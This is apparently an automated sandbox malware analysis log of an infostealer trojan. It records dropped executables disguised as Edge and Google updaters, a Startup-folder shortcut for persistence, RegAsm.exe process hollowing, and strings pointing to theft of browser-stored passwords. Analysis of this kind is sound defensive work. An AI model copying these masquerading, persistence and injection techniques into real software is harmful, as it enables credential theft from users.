                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB0846019_2_6BB08460
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBB9BB019_2_6BBB9BB0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB49BA019_2_6BB49BA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBD5B9019_2_6BBD5B90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BAE1B8019_2_6BAE1B80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB37BF019_2_6BB37BF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB3BB2019_2_6BB3BB20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBCFB6019_2_6BBCFB60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBCDAB019_2_6BBCDAB0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BAF1AE019_2_6BAF1AE0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBEDA3019_2_6BBEDA30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC79A5019_2_6BC79A50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB2FA1019_2_6BB2FA10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB91A1019_2_6BB91A10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBC199019_2_6BBC1990
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB0198019_2_6BB01980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB559F019_2_6BB559F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB879F019_2_6BB879F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB299D019_2_6BB299D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB899C019_2_6BB899C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBA592019_2_6BBA5920
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC3F90019_2_6BC3F900
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB6F96019_2_6BB6F960
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBAD96019_2_6BBAD960
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC4B8F019_2_6BC4B8F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBCF8F019_2_6BBCF8F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BAFD8E019_2_6BAFD8E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB238E019_2_6BB238E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB8F8C019_2_6BB8F8C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB4D81019_2_6BB4D810
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC0DFC019_2_6BC0DFC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC73FC019_2_6BC73FC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB11F9019_2_6BB11F90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB9BFF019_2_6BB9BFF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB25F2019_2_6BB25F20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BAE5F3019_2_6BAE5F30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC47F2019_2_6BC47F20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB13EC019_2_6BB13EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC75E6019_2_6BC75E60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBFDE1019_2_6BBFDE10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC4BE7019_2_6BC4BE70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BAE3D8019_2_6BAE3D80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BC39D9019_2_6BC39D90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBC1DC019_2_6BBC1DC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB53D0019_2_6BB53D00
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\EBAEBFIIEC.exe BB28BB63ED34A3B4F97A0A26BDA8A7A7C60F961010C795007EDC52576B89E4D3
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\FIEHIIIJDA.exe 0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6BC709D0 appears 282 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6BB13620 appears 88 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004172E0 appears 53 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6BC29F30 appears 49 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6BB4C5E0 appears 34 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0053EA30 appears 39 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6BC7DAE0 appears 67 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6BB19B10 appears 76 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004045C0 appears 317 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6BC7D930 appears 54 times
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 12268
                            Source: file.exe, 00000000.00000002.2124493240.0000000002C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
                            Source: file.exe, 00000000.00000000.2094846483.0000000000B3A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
                            Source: file.exe, 00000000.00000002.2120721741.000000000110E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: f98ae5e6665140c7bc7a10ef5c598fcb.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 66fbfcc301a31_swws[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ZNiWLZA4sT3dAjz_lF65fVs6.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 66fbfccd837ac_vadggdsa[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: E4aR4O9hOTF5WJfvKNpcVCp8.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: file.exeStatic PE information: Section: Z Hi? ZLIB complexity 1.000381324404762
                            Source: LKMService.exe.0.drStatic PE information: Section: Z Hi? ZLIB complexity 1.000381324404762
                            Source: GoogleUpdater.exe.2.drStatic PE information: Section: Z Hi? ZLIB complexity 1.000381324404762
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@71/183@27/20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB50300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,19_2_6BB50300
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,19_2_00419600
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004327D0 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,VariantClear,CoUninitialize,6_2_004327D0
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7f7765716ecd48468fd42866f53e185b.lnkJump to behavior
                            Source: C:\ProgramData\EBAEBFIIEC.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7060
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6308
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\KejwopdnfWW_4
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4016
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1208:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeUpdaterJump to behavior
                            Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                            Source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                            Source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                            Source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                            Source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                            Source: RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                            Source: RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                            Source: RegAsm.exe, RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                            Source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                            Source: RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                            Source: RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.0000000001645000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.0000000001629000.00000004.00000020.00020000.00000000.sdmp, IIIDAKJDHJKFHIEBFCGH.19.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                            Source: RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832043185.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                            Source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                            Source: file.exeReversingLabs: Detection: 36%
                            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe"
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 12268
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 71444
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6308 -s 81740
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCGHCGIIDGD.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userCGHCGIIDGD.exe "C:\Users\userCGHCGIIDGD.exe"
                            Source: C:\Users\userCGHCGIIDGD.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userJEHDHIEGII.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userJEHDHIEGII.exe "C:\Users\userJEHDHIEGII.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\userCGHCGIIDGD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
